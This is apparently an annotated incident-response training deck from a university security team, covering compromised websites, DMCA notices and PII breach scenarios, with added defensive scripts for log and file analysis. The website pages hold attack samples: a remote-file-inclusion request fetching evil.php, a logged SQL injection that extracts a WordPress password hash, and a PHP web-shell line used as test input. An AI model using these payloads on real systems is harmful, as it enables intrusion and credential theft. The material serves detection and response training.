4. The Unix/other webserver administrator attempts to locate and mitigate the initial attack vector.
5. The Unix/other admin clears the Google cache.
6. The Unix/other admin moves the help desk ticket back to the security-requests queue.
7. Info-Security/Webserver Administration notifies the site owner (see below for text) and BCCs [email protected].
8. Info-Security closes the ticket.
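Step 3 of the removal procedure (find the world-writable locations and capture the offending files) and the obfuscated cloaker shown on pages 48 to 50 call for the same sweep of the document root. The script below is an added example for this transcript, not a tool from the talk: it decodes every `eval(base64_decode("..."))` it finds, even when the string is cut off as on the slide, scores a file by the cloaker's traits (referrer check for search engines, a `$bot_list` of crawler IPs, pharmacy keywords) in both the visible code and the decoded payload, and walks a directory tree reporting world-writable entries alongside suspicious PHP files. The trait list is my reading of the code on pages 48 to 50, and `build_cloaker_sample` produces a constructed test file, not the real one.

```python
import base64
import os
import re
import stat
from typing import Dict, List

EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")

# Traits of the cloaker on pages 48-50. Two or more together flag a file even
# when nothing is base64-wrapped.
CLOAK_TRAITS = {
    "referrer_check": re.compile(r"HTTP_REFERER"),
    "search_engine_regex": re.compile(r"live\|msn\|yahoo\|google", re.I),
    "crawler_ip_list": re.compile(r"\$bot_list\s*="),
    "pharma_keywords": re.compile(r"viagra|cialis|phentermine|xanax|tramadol", re.I),
}


def decode_eval_payloads(source: str) -> List[str]:
    """Decoded text of every eval(base64_decode("...")) in source. A string cut
    off mid-way (as on the slide) is trimmed and padded so its readable prefix
    comes back instead of an exception."""
    out = []
    for b64 in EVAL_B64_RE.findall(source):
        if len(b64) % 4 == 1:          # a lone trailing character can never decode
            b64 = b64[:-1]
        b64 += "=" * (-len(b64) % 4)
        try:
            out.append(base64.b64decode(b64).decode("latin-1"))
        except ValueError:              # binascii.Error is a ValueError subclass
            out.append("")
    return out


def scan_php_source(source: str) -> Dict[str, object]:
    """Report obfuscated evals and cloaking traits in one file's text, looking
    inside the decoded payloads as well as the visible code."""
    payloads = decode_eval_payloads(source)
    visible = source + "\n" + "\n".join(payloads)
    traits = sorted(name for name, rx in CLOAK_TRAITS.items() if rx.search(visible))
    return {
        "obfuscated_evals": len(payloads),
        "decoded_prefixes": [p[:60] for p in payloads],
        "cloaking_traits": traits,
        "suspicious": bool(payloads) or len(traits) >= 2,
    }


def scan_docroot(root: str) -> List[Dict[str, object]]:
    """Walk a document root: flag world-writable files and directories (what
    step 3 above resets) and PHP files that scan_php_source flags."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if mode & stat.S_IWOTH:
                findings.append({"path": path, "issue": "world-writable"})
            if stat.S_ISREG(mode) and name.lower().endswith((".php", ".phtml", ".inc")):
                with open(path, "r", encoding="latin-1") as fh:
                    report = scan_php_source(fh.read())
                if report["suspicious"]:
                    findings.append({"path": path, "issue": "obfuscated/cloaking php", **report})
    return findings


def build_cloaker_sample() -> str:
    """Constructed test input (not the page's code): an innocuous-looking page
    whose spam logic is hidden behind eval(base64_decode(...))."""
    payload = (
        'error_reporting(0);\n'
        '$bot_list = array("192.0.2.1","198.51.100.7");\n'
        "if (preg_match('/live|msn|yahoo|google|ask|aol/', $_SERVER[\"HTTP_REFERER\"])) "
        '{ $niche = "viagra"; }'
    )
    b64 = base64.b64encode(payload.encode()).decode()
    return '<?php eval(base64_decode("%s")); ?>\n<html><body>Department home page</body></html>' % b64


if __name__ == "__main__":
    print(scan_php_source(build_cloaker_sample()))
```

Run `scan_docroot` on a copy of the web root taken for evidence, not on the live tree, so that capturing the files (step 3) happens before anything is deleted. The decoder deliberately does not execute anything: `eval` of attacker code is exactly what the compromised site was doing.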

Page 53

Compromised Website

Swimlane diagram (figure); text in diagram order, lane labels as they appear:

Inputs: Botnet Sensors (Ourmon, FireEye, Snort); Security Researcher; Internet; Wormwatch mailing list; Google Alerts; External email notice
Example alerts: 131.252.x.x NERO says bad; 131.252.x.x Acting Bad; 131.252.x.x talking to bad; 38.100.x.x External source says bad

User Support / Server Support / TAGs:
  Route HelpDesk tickets to Security
  Route tickets to Server, TAG or Website Owner
  Identify server or webpage owner
  Identify compromised account
  Locate malware
  Determine attack vector

Security Team:
  Locate infected system
  Identify system owner
  Re-image computer
  User interaction
  Process Google Alert
  Analyze compromised web site
  Create tracking ticket
  ID website owner/developer
  Analyze malware
  Ensure appropriate resources are working the incident
  Identify useful intelligence markers
  Contact target ISP and/or website owner and linked pages
  Share with aggregators (Wormwatch mailing list)

Website Owner:
  Limit damage
  Find root cause
  Mitigate vulnerability
  Restore webpage and ask to restore access
  Keep Security Team informed on status

Page 54

Uploading fake pictures

Diagram (Attacker, Webhost.com):

1. The evil user posts an executable file with a .gif extension (notapic.gif).
2. The evil user browses to the executable "gif".
3. Webhost executes notapic.gif as the web page owner.

Page 55

PHP URL includes

Diagram (Attacker, Target.com, Webhost.com):

1. GET /a.php?vuln=http://webhost.com/evil.php
2. Target makes a request to webhost.com/evil.php.
3. The malware PHP file evil.php is sent to Target.com and is executed by the include() function.
4. The output from evil.php is sent to the attacker.

Vulnerable code on Target.com:

<?php include($vuln); ?>

This remote file inclusion only works when PHP is configured to let include() fetch URLs (allow_url_include, or allow_url_fopen on releases before 5.2) and when $vuln is filled from the request, either through register_globals or by an explicit assignment from $_GET; both settings were common on the shared hosts of the period.
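Pages 54 and 55 describe two ways attacker code ends up running on a web host: a script uploaded under an image name, and a URL smuggled into an include() parameter. The script below is an added example for this transcript, not code from the talk: `classify_upload` decides from the leading bytes rather than the file name whether an upload is really a picture (and rejects a genuine GIF with `<?php` appended, which would still run if the server executed it), and `find_rfi_attempts` scans Apache combined-format access log lines for query parameters that are themselves URLs or PHP stream wrappers, percent-encoded or not. The magic-byte tables and the sample log lines are constructed for the example.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Leading bytes of the picture formats an image upload should accept.
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
}
# Leading bytes of things that are never pictures.
CODE_MAGIC = {b"<?php": "php", b"#!": "script", b"\x7fELF": "elf", b"MZ": "pe"}
EXT_FAMILY = {"gif": "gif", "png": "png", "jpg": "jpeg", "jpeg": "jpeg"}


def classify_upload(filename: str, data: bytes) -> Dict[str, object]:
    """Decide from the bytes, not the name, whether an upload is a picture.
    Catches notapic.gif (PHP with a .gif name) and a real GIF with PHP
    appended, which still runs if the server ever executes it."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    family = EXT_FAMILY.get(ext)
    detected = next((t for m, t in IMAGE_MAGIC.items() if data.startswith(m)), None)
    code = next((t for m, t in CODE_MAGIC.items() if data.startswith(m)), None)
    reasons = []
    if family is None:
        reasons.append("extension is not an allowed image type")
    if code:
        reasons.append(f"content starts as {code}, not an image")
    elif detected != family:
        reasons.append(f"magic bytes say {detected}, extension says {family}")
    if b"<?php" in data:
        reasons.append("php open tag inside file (polyglot)")
    return {"extension": ext, "detected": detected, "accept": not reasons, "reasons": reasons}


LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
REMOTE_RE = re.compile(r"(?i)^(?:(?:https?|ftp|php|data)://|//)")

# Constructed Apache combined-format lines modelled on the page-55 request.
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [04/Aug/2008:02:31:07 -0700] "GET /a.php?vuln=http://webhost.example/evil.php HTTP/1.0" 200 512
203.0.113.9 - - [04/Aug/2008:02:31:09 -0700] "GET /a.php?vuln=http%3A%2F%2Fwebhost.example%2Fevil.txt%3F HTTP/1.0" 200 512
198.51.100.4 - - [04/Aug/2008:02:32:00 -0700] "GET /a.php?vuln=header.php HTTP/1.1" 200 1024
"""


def find_rfi_attempts(access_log: str) -> List[Dict[str, str]]:
    """Requests in which a query parameter is itself a URL or stream wrapper:
    the /a.php?vuln=http://webhost.com/evil.php pattern, encoded or not."""
    hits = []
    for line in access_log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:            # parse_qs already percent-decodes
                if REMOTE_RE.match(value):
                    hits.append({"src": m["ip"], "param": param,
                                 "include_url": value, "status": m["status"]})
    return hits


if __name__ == "__main__":
    print(classify_upload("notapic.gif", b"<?php system($_GET['c']); ?>"))
    for h in find_rfi_attempts(SAMPLE_ACCESS_LOG):
        print(h)
```

Magic-byte checks stop the trivial case; the durable fix for page 54 is to store uploads outside the document root or under a directory the web server is configured never to execute, so that a polyglot that slips through is served as bytes rather than run. A hit from `find_rfi_attempts` with status 200 is the log evidence that the include fetched something, which is what to correlate with the outbound request in the firewall or NetFlow data.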

Page 56

Mod-Sec SQL Injection

ModSecurity audit log entry (parts A, B, F and H of the serial audit format):

--346e283e-A--
[04/Aug/2008:02:30:00 --0700] @7eQMYP8ehcAAE5qKi4AAAAR 87.118.116.150 47075 131.252.122.155 80
--346e283e-B--
GET /shesheet/wordpress/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
Host: www.wrc.pdx.edu
Connection: close

--346e283e-F--
HTTP/1.0 200 OK
X-Powered-By: PHP/5.2.5
X-Pingback: http://www.wrc.pdx.edu/shesheet/wordpress/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8

--346e283e-H--
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack. Matched signature <union select>"] [severity "CRITICAL"]
Stopwatch: 1217842199892017 888678 (5475 6478 -)
Producer: ModSecurity v2.1.5 (Apache 2.x)
Server: Apache/2.2.8 (OpenPKG/CURRENT)
--346e283e-Z--

What the request does: %2527 is a double-encoded single quote (%25 is "%", so it decodes to %27 and then to '), which closes the string in the WordPress query; the UNION SELECT then appends the password hash of the user with id 1 from wp_users, wrapped in "666:" markers so it is easy to find in the page output. Note the response in part F: 200 OK, and the message in part H begins "Warning". The rule set logged the attack but did not block it, so the query reached WordPress. Check whether the engine is running in detection-only mode before counting on ModSecurity for containment.
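The audit entry above has everything an investigator needs, but spread over four parts with the interesting argument double-encoded. The parser below is an added example for this transcript, not code from the talk or from the ModSecurity project: it splits a serial-format entry into its lettered parts, peels the percent-encoding layer by layer and counts them (two for %2527), flags UNION SELECT in the decoded value, pulls the rule id, message and severity from part H, and reads the response status from part F to answer the question the slide leaves open: was the request blocked? The sample entry is a constructed copy of the one above with the long rule regex abbreviated.

```python
import re
from typing import Dict, Tuple
from urllib.parse import unquote, urlsplit

# Constructed ModSecurity serial audit-log entry modelled on the one above
# (same request; the long rule regex in the H part is abbreviated).
SAMPLE_AUDIT_LOG = """\
--346e283e-A--
[04/Aug/2008:02:30:00 --0700] @7eQMYP8ehcAAE5qKi4AAAAR 87.118.116.150 47075 131.252.122.155 80
--346e283e-B--
GET /shesheet/wordpress/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
Host: www.wrc.pdx.edu
Connection: close

--346e283e-F--
HTTP/1.0 200 OK
X-Powered-By: PHP/5.2.5
Connection: close
Content-Type: text/html; charset=UTF-8

--346e283e-H--
Message: Warning. Pattern match "(?:\\\\b(?:(?:s(?:elect\\\\b ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack. Matched signature <union select>"] [severity "CRITICAL"]
Stopwatch: 1217842199892017 888678 (5475 6478 -)
Producer: ModSecurity v2.1.5 (Apache 2.x)
Server: Apache/2.2.8 (OpenPKG/CURRENT)
--346e283e-Z--
"""

PART_RE = re.compile(r"^--([0-9a-f]+)-([A-Z])--$", re.M)
SQLI_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b|\bselect\b.+\bfrom\b", re.I | re.S)


def split_parts(entry: str) -> Dict[str, str]:
    """Map each part letter (A, B, F, H, ...) to its text."""
    marks = list(PART_RE.finditer(entry))
    parts = {}
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(entry)
        parts[m.group(2)] = entry[m.end():end].strip("\n")
    return parts


def fully_decode(value: str, max_rounds: int = 5) -> Tuple[str, int]:
    """Percent-decode until the value stops changing; return the value and how
    many layers were peeled. %2527 needs two rounds to become a quote."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(value)
        if nxt == value:
            break
        value, rounds = nxt, rounds + 1
    return value, rounds


def analyze_entry(entry: str) -> Dict[str, object]:
    parts = split_parts(entry)
    a = parts.get("A", "").split()   # [timestamp tz] unique-id src-ip src-port dst-ip dst-port
    request_line = parts.get("B", "").splitlines()[0]
    method, target, _ = request_line.split(" ", 2)
    args = {}
    for pair in urlsplit(target).query.split("&"):
        name, _, raw = pair.partition("=")
        decoded, layers = fully_decode(raw.replace("+", " "))
        args[name] = {"decoded": decoded, "encoding_layers": layers,
                      "sqli": bool(SQLI_RE.search(decoded))}
    f_lines = parts.get("F", "").splitlines()
    status = int(f_lines[0].split()[1]) if f_lines else None
    h = parts.get("H", "")
    action = re.match(r"Message: (\w+)\.", h)
    rule_id = re.search(r'\[id "(\d+)"\]', h)
    msg = re.search(r'\[msg "([^"]*)"\]', h)
    sev = re.search(r'\[severity "([^"]*)"\]', h)
    return {
        "src_ip": a[3], "dst_ip": a[5], "method": method, "path": urlsplit(target).path,
        "args": args, "status": status,
        "action": action.group(1) if action else None,
        "rule_id": rule_id.group(1) if rule_id else None,
        "rule_msg": msg.group(1) if msg else None,
        "severity": sev.group(1) if sev else None,
        # A 2xx/3xx response means the engine only logged; the injection reached the app.
        "blocked": status is not None and status >= 400,
    }


if __name__ == "__main__":
    for key, value in analyze_entry(SAMPLE_AUDIT_LOG).items():
        print(f"{key:10} {value}")
```

Counting the encoding layers is worth keeping in the output: a single layer is what any browser produces, while two or more is almost always an evasion attempt aimed at a filter that decodes only once.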


DMCA

Roles and hand-offs in the DMCA workflow (flattened from the slide's diagram):

Internet (where complaints come from)
• Email to [email protected] from the copyright owner or from a consortium representative
• Settlement bids
• Organized crime

Horde (abuse mailbox)
• Abuse IMAP folder
• Extract DMCA complaints

Network Team (NTS)
• Create tracking ticket
• Identify computer or user
• Email and mail user
• If no response or 2nd violation: block network access and file an AUP violation with the Dean of Students

Security Team
• Investigate "It wasn't me" claims
• Investigate questionable DMCA complaints
• Give DMCA formal sanction presentation
• Coordinate strategy with SLMS and the Dean of Students
• Sign form when complete

Dean of Students
• Process AUP violation
• Communicate with user
• Issue sanctions
• Inform NTS that sanctions have been satisfied

User Support
• Receive user responses
• Forward responses to NTS
• Refer "It wasn't me" claims

Student Legal
• Counsel student on legal aspects
• Coordinate strategy with the Dean of Students and the CISO
• Sign form when complete

User Reports
• DMCA complaint


DMCA Investigative process

Each row pairs an incident response phase (investigation method) with the investigation step and describes how that step plays out in the DMCA violation response scenario.

Preparation
  Accusation or Incident Alert: Notify. Most notifications are sent to your abuse email address. Final stages (subpoenas) may be sent via postal mail. Notifications that skip the "take-down" notice stage should be vetted. Seek legal counsel's advice about forwarding suspect notices.
  Assessment of Worth: You are legally obligated to forward DMCA notices to the intended recipient in a timely manner. Failure to do so could cost "safe harbor" status and could result in your organization being made a party to the resulting lawsuits. You should only investigate the claim if a user disputes the allegation.
  Incident/Crime Scene Protocols: Begin the process of ensuring the admissibility of evidence. Designate an organization and an individual to be responsible for keeping all DMCA documentation. All copies of notices and responses from the suspect should be retained. Any analysis performed related to the case should be identified and preserved with the other case documentation.

Detection
  Identification or Seizure: Using the protocols established above, ensure that all potential network evidence is identified and documented. Ensure that the IP address to DHCP lease mapping is captured in a timely manner, since it is dynamic and DHCP logs may not last forever.

Analysis
  Preservation: Document the incident. Open an incident ticket; use the special DMCA queue for all DMCA-related tickets.
  Recovery: Identify and collect potential evidence from network and enterprise systems. These notices sometimes come months after the actual event. If the user disputes the claim, and the logs still exist, gather them from firewalls, switches, Ourmon, or DHCP. If too much time has passed you may have to rely on the suspect's computer. The suspect may be hostile to your investigation, even if innocent; they may ask you to investigate while attempting to obscure the evidence of the incident.
  Harvesting: Use experience to examine the collected data and identify class characteristics that might contribute to the investigation. In DMCA cases you are primarily performing functional analysis: you are looking for evidence that would include or exclude the user's computer from the alleged act (such as a right or wrong MAC address, presence or absence of network traffic supporting the allegation, etc.).
  Reduction: Use the output of the Harvesting step to extract allegation-specific network traffic entries from evidence sources (firewall logs, tcpdump, Ourmon logs, NetFlow data, etc.). From the suspect's computer you might extract firewall logs, Internet history, browser caches, and temporary Internet files.
  Organization and Search: Use consistent naming schemes and folder hierarchies. Make it easier for the investigator to find and identify data during the Analysis step. Enable repeatability and accuracy of subsequent analysis.
  Analysis: Locating the user's identity will involve relational analysis. For LAN connections your network team will examine the relationships between the IP address, the MAC address and a time frame; between the MAC address, the DHCP server, and the switch; between the switch, the MAC address, and the switch port; between the switch port and the data jack; between the data jack and a physical location; and between the physical room and the people associated with that room. Authenticated wireless connections at Portland State tie the userid to an IP address at a particular time. If the user disputes the copyright owner's claims, you will perform temporal analysis to group all activities that were recorded during the time of the alleged incident. You would then use the results of temporal analysis to perform functional analysis, in which you determine whether the available evidence tends to support the claim of the copyright holder or not. If not, determine whether the evidence points to another suspect or whether there is no data related to the incident at all. In the latter case, consider and investigate the possibility that the notice was fraudulent, and determine why this victim was selected (victimology).

Containment (step: none)
  Triage: Your organization is obligated by the DMCA to prevent the recurrence of this kind of event. Most organizations shut off Internet access once the suspect has been notified three times; Portland State does so on the second notice. If the suspect is a student, the Dean of Students is notified. In order to regain network access, the student must attend briefings by Student Legal and Mediation Services and by IT. The Dean of Students can take other punitive actions if there are further incidents, such as loss of network privileges for a year, or fines of up to $200.

Eradication (step: none)
  Subjects are directed to remove all copyrighted material that was identified in the take-down notice.

Recovery (step: none)
  Subjects are directed to respond to the notice, acknowledging that they have received it, that they understand the DMCA policy, and that they will comply with it in the future. They are instructed to take down the intellectual property that was identified in the notice. The subject is not required to address guilt or innocence. Once they have followed the instructions, their network access is restored. Users who receive two or more notices are required to attend a DMCA awareness briefing.

Post-Incident Activity
  Reporting: Annually, the number of notices received and presentations given should be reported to management. Subpoenas, notices of intent to file a subpoena, and settlement offer letters should be reported to General Counsel.
  Persuasion and Testimony: Prepare presentations and brief executive management. Give awareness presentations to relevant stakeholders. Prepare pamphlets, informational websites, flyers, etc. to reduce the rate of DMCA incidents.
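The relational analysis described in the Analysis step (IP address and time, to MAC address via DHCP, to switch port, to data jack, to room, to occupants, or directly to a userid for authenticated wireless), as an added example that is not the slides' own tooling. Every record below is constructed, and the field layouts are this example's own rather than any DHCP server's or switch's export format. It makes two checks explicit that ad hoc lookups often skip: the notice time (usually stated in UTC by the copyright holder) is converted to the logs' local zone before any lookup, and the DHCP lease and the switch MAC-table observation must both cover that instant, since a lease that expired an hour earlier, or a MAC last seen the day before, is not evidence.

```python
"""Relational analysis for a DMCA notice: IP and time to MAC, switch port, jack, room, occupants.

Added example for this page, not the slides' own tooling. All records are
constructed; the layouts are this example's, not any product's export format.
Two checks that the Analysis step depends on are made explicit: the notice time
(copyright holders usually state UTC) is converted to the logs' local zone first,
and both the DHCP lease and the switch MAC-table observation must cover that
instant before anything is attributed to a port, a room or a person.
"""
from datetime import datetime, timedelta, timezone

LOCAL_TZ = timezone(timedelta(hours=-7))  # assumed: logs are kept in US Pacific Daylight Time


def local(s):
    """Parse a constructed log timestamp ('YYYY-MM-DD HH:MM') in LOCAL_TZ."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M").replace(tzinfo=LOCAL_TZ)


def utc(s):
    """Parse a notice timestamp ('YYYY-MM-DD HH:MM') as UTC."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M").replace(tzinfo=timezone.utc)


# (ip, mac, lease_start, lease_end): the same address handed to two machines in one day
DHCP_LEASES = [
    ("131.252.10.42", "00:1a:2b:3c:4d:5e", local("2010-04-19 08:00"), local("2010-04-19 20:00")),
    ("131.252.10.42", "00:aa:bb:cc:dd:ee", local("2010-04-20 01:00"), local("2010-04-20 13:00")),
    ("131.252.10.42", "00:1a:2b:3c:4d:5e", local("2010-04-20 14:00"), local("2010-04-21 02:00")),
]
# (mac, switch, port, seen_at): periodic MAC-table polls
MAC_TABLE = [
    ("00:aa:bb:cc:dd:ee", "sw-dorm3-1", "Gi1/0/17", local("2010-04-20 02:15")),
    ("00:1a:2b:3c:4d:5e", "sw-lib-2", "Gi1/0/3", local("2010-04-20 15:05")),
]
# (switch, port) -> (jack, room); room -> people assigned to it
JACKS = {("sw-dorm3-1", "Gi1/0/17"): ("D3-214-B", "Dorm 3 room 214")}
OCCUPANTS = {"Dorm 3 room 214": ["student A", "student B"]}
# (userid, ip, start, end): authenticated wireless ties the userid to the address directly
WIRELESS = [("jdoe", "131.252.200.9", local("2010-04-20 02:00"), local("2010-04-20 04:00"))]


def resolve(ip, notice_time, window=timedelta(hours=1)):
    """Return what the logs support for `ip` at `notice_time` (an aware datetime)."""
    t = notice_time.astimezone(LOCAL_TZ)
    result = {"ip": ip, "local_time": t.isoformat()}
    for user, wip, start, end in WIRELESS:
        if wip == ip and start <= t <= end:
            result.update(userid=user, source="authenticated wireless")
            return result
    leases = [l for l in DHCP_LEASES if l[0] == ip and l[2] <= t <= l[3]]
    if not leases:
        result["error"] = "no DHCP lease covers the notice time (retention, clock skew or wrong zone?)"
        return result
    if len(leases) > 1:
        result["error"] = "overlapping leases; the DHCP log is inconsistent, do not attribute"
        return result
    mac = leases[0][1]
    result["mac"] = mac
    seen = [m for m in MAC_TABLE if m[0] == mac and abs(m[3] - t) <= window]
    if not seen:
        result["error"] = "MAC not observed on any switch within %s of the notice time" % window
        return result
    _, switch, port, _ = min(seen, key=lambda m: abs(m[3] - t))
    jack, room = JACKS.get((switch, port), (None, None))
    result.update(switch=switch, port=port, jack=jack, room=room,
                  people=OCCUPANTS.get(room, []), source="dhcp + switch + jack map")
    return result


if __name__ == "__main__":
    print(resolve("131.252.10.42", utc("2010-04-20 09:30")))  # resolves to a dorm room
    print(resolve("131.252.10.42", utc("2010-04-20 03:30")))  # falls between leases
    print(resolve("131.252.200.9", utc("2010-04-20 10:00")))  # wireless: userid directly
```

Note that even a full chain ends at a room and its assigned occupants, not at a person; that is why the Harvesting step looks for the MAC address and traffic on the suspect's own machine before anything is attributed.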


DMCA Workflow


PII Suspected Incident

• Is it an incident?
• Incidents require mitigation
• Incidents may or may not require notification

• Is it a breach?
• Breaches require mitigation
• Breaches require notification

All breaches are incidents but not all incidents are breaches


What is a Breach?

A (reportable) breach is the unauthorized acquisition, access, use, or disclosure of PII in a manner not permitted by law or regulation and which compromises the security and privacy of the PII.

Paraphrased from a PHI breach definition by Pepper Hamilton, LLP

We are using the term breach to describe all incidents that legally require notification to damaged parties.


Relevant Law or Regulation

• FERPA: protection of student data
• FACTA Red Flag Rules: finance
• Payment Card Industry Data Security Standard: credit cards
• Gramm-Leach-Bliley (GLB) Act: financial consumers
• USA PATRIOT Act: data preservation and wiretapping requests
• Student and Exchange Visitor Information System (SEVIS): international students
• Higher Education Opportunity Act: record keeping, business processes, and reporting
• Health Insurance Portability and Accountability Act (HIPAA): health records
• HITECH Act: protected health information, breach notification and enforcement
• Digital Millennium Copyright Act (DMCA): protection of digital media
• Electronic discovery (e-discovery): also Rule 37 of the Federal Rules of Civil Procedure
• Jeanne Clery Disclosure of Campus Security Policy and Campus Crime Statistics Act (Clery Act): campus crime
• State law, e.g. the Oregon Identity Theft Protection Act: personally identifiable information breach notification
• State law regarding disclosure of faculty/staff records
• PCI standards: credit card and bank account information
• VISA PA-DSS best practices and validated applications list
• Others? Information covered by NDAs, information protected by export law


Breach or Incident?

Two methods for determining if a breach occurred:
• By definition
• By risk-of-harm analysis

• How do you prove a negative?


What if there is no known Harm?

A compromise of the security and privacy of personal private information must pose a significant risk of financial, reputational, or other harm to the individual. Use a risk assessment to determine if harm exists. (Pepper Hamilton LLP webinar)

Not all disclosures will be breaches; the disclosure must cross the harm threshold.

Overcoming access controls does not constitute a breach by itself. It must lead to a use or disclosure of PPI that is not permitted by law or regulation, and it must also cross the "harm threshold."


Risk of Harm Questions

• Were the recipients obligated (by policy or regulation) to protect the privacy and security of the information?
• Can the impact of the disclosure be mitigated? (pre-existing NDAs or other measures that assure no further disclosure)
• Was it returned before improper use could occur?
• Did the forensic investigation find any evidence of improper use, discovery, or distribution?
• What was disclosed, and how much?


No Breach?

A breach has not occurred if:
• PII is not stored in the cloud
• PII is "secured" (encrypted*)
• There is little risk of harm

Pepper Hamilton, LLP

* some states also exempt encoded data


Activity: Putting it into practice

Questions:
• Is this a breach or an incident?
• What process did you use to make your decision?
• Who needs to be notified? How?
• What mitigation may be necessary?


Scenarios: Suspected incidents

• A former student reports to you that, using Google, he has found his SSN on one of your systems.
• A professor reports to you that his laptop was stolen and on it he maintained a list of student names and student ID numbers.
• A professor discovers that he can see other employees' home directories.
• A staff person discovers advising files of current and former students available to view by all authenticated users on a web-accessible storage service.
• A website hosted in the cloud is defaced.


SSN found via Google

One of your former students reports to you that, using Google, he has found his SSN on one of your systems.

• Data, when stored (2004), was not considered sensitive
• Some data was not PII but was still sensitive
• Data was stored on a listserv which Google crawled
• In 2005-2007, some instances were removed from the listserv, but not from Google's cache of the web page!


SSN Breach Response

Discovery
• Searched for other, similar PII data
• Determined where other instances may have been cached (Internet Time Machine, Google, etc.)
Short-term mitigation
• Known PII data was taken down
• Google's cache was flushed
• Listserv was reconfigured to change all lists to private
Notification
• Met with General Counsel and HR
• Determined this was a breach (by definition and by risk-of-harm analysis)
• Briefed executive level
• Drafted a letter to send to the potential victims
• For sensitive data not covered by law or regulation, the business owner was given the option to notify or not (subject to executive override)
Long-term mitigation
• Reviewed lists and deleted all lists that hadn't had activity in 2 years (a time bomb of unnecessary liability)
• Changed our process to make private the default listserv setting
Awareness
• Discussed posting practices with the listserv owner
• Documented and responded to users' questions from the notification


Student ID

One of your professors reports to you that his laptop was stolen and on it he maintained a list of student names and student ID numbers.

Is it a breach by definition?

According to the Dec 2008 FERPA revision, it depends.


Student ID

“we modified the rule to allow student ID numbers to be disclosed as directory information if they qualify as electronic identifiers”

“The regulations will allow an educational agency or institution to disclose as directory information a student’s ID number, user ID or other electronic identifier so long as the identifier functions like a name; that is, it cannot be used without a PIN, password, or some other authentication factor to gain access to education records. This change will impose no costs and will provide benefits in the form of regulatory relief allowing agencies and institutions to use directory services in electronic communications systems without incurring the administrative costs associated with obtaining student consent for these disclosures.”


Student ID

"Directory Information", data that can be made public without *student* permission. Each college must decide, within certain limits, what it considers Directory Information, and must publish the list. Typically this includes things like name, phone number, address, graduation year, and major. According to FERPA Regulations, Directory Information is "information contained in an education record of a *student* that would not generally be considered harmful or an invasion of privacy if disclosed".

Steven Worona

In order to treat the student id as directory information, each college must officially declare it to be so and publish the new list of directory information.


Exception

However, parents and eligible students can opt out of directory information disclosures; those that do will not be able to participate in student services that are delivered in this manner.

Which means you may have a student id related breach for a few students even after declaring student identification to be directory information.


Student ID Breach Response

Discovery
• Interviewed the professor; determined there was only one instance of the lost data
Short-term mitigation
• None
Notification
• Met with General Counsel, Admissions, Records, and Registration (ARR) and HR
• Determined this was a breach (by definition)
• Briefed executive level
• Drafted a letter to send to the potential victims, sent by the professor's department
Long-term mitigation
• Pursue including student ID as directory information
Awareness
• Gave presentations about student ID as directory information
• Began discussions with General Counsel and ARR


Small Private College with Law School

An Information Technology staff person discovered advising files of 14 current and former students available to view by all authenticated users (only) on our web accessible storage service (Xythos). The files contained high school transcripts and College application materials for our first year advising program. These files contained personally identifying information (SSN and birthdate).

Upon finding this information available, the IT staff person immediately made a “copy” of the environment for forensics purposes and then removed the permissions from the files to protect that sensitive information. It was determined that the files were accessible to all authenticated users (and not the general public) for one week. We were not able to determine if the files had been viewed by anyone during that time period.



Small Private College with Law School

General Counsel advised that we notify the affected 14 individuals per the Oregon notification legislation. The notification happened on September 2 through email and certified postal mail, and offered a year of credit monitoring (which no one took us up on). Post incident: We immediately suspended the first year advising application utilizing the web storage service until the sensitive information could be redacted from the scanned images. Going forward, all personally identifying information will be redacted upon scanning.



College with Law School Response

Discovery
• IT staff member discovered sensitive files for 14 students were viewable by any authenticated user
Short-term mitigation
• Copy of the environment made for forensics
• Removed permissions from the sensitive files
• Analyzed exposure (1 week); unable to determine if anyone viewed the files
• Suspended the application from using the web storage service until the sensitive information could be redacted from the scanned images
Notification
• Can't determine risk of harm
• Met with General Counsel; determined this was a breach
• Notified users via email and postal mail
• Offered 1 year of credit monitoring
Long-term mitigation
• Implement a process to redact PII upon scanning
Awareness
• Additional training may be indicated


Missing Access Control

A University professor discovers that he can see other employees' home directories.


Access Controls

Your staff discovers that six days ago the ACLs on your staff directories/folders were unintentionally modified for a vendor.

• Inheritance was turned off, which changed all lower-level effective permissions.
• Directories normally protected by restrictive ACLs were modified to permit read-only access by anyone with an active account.
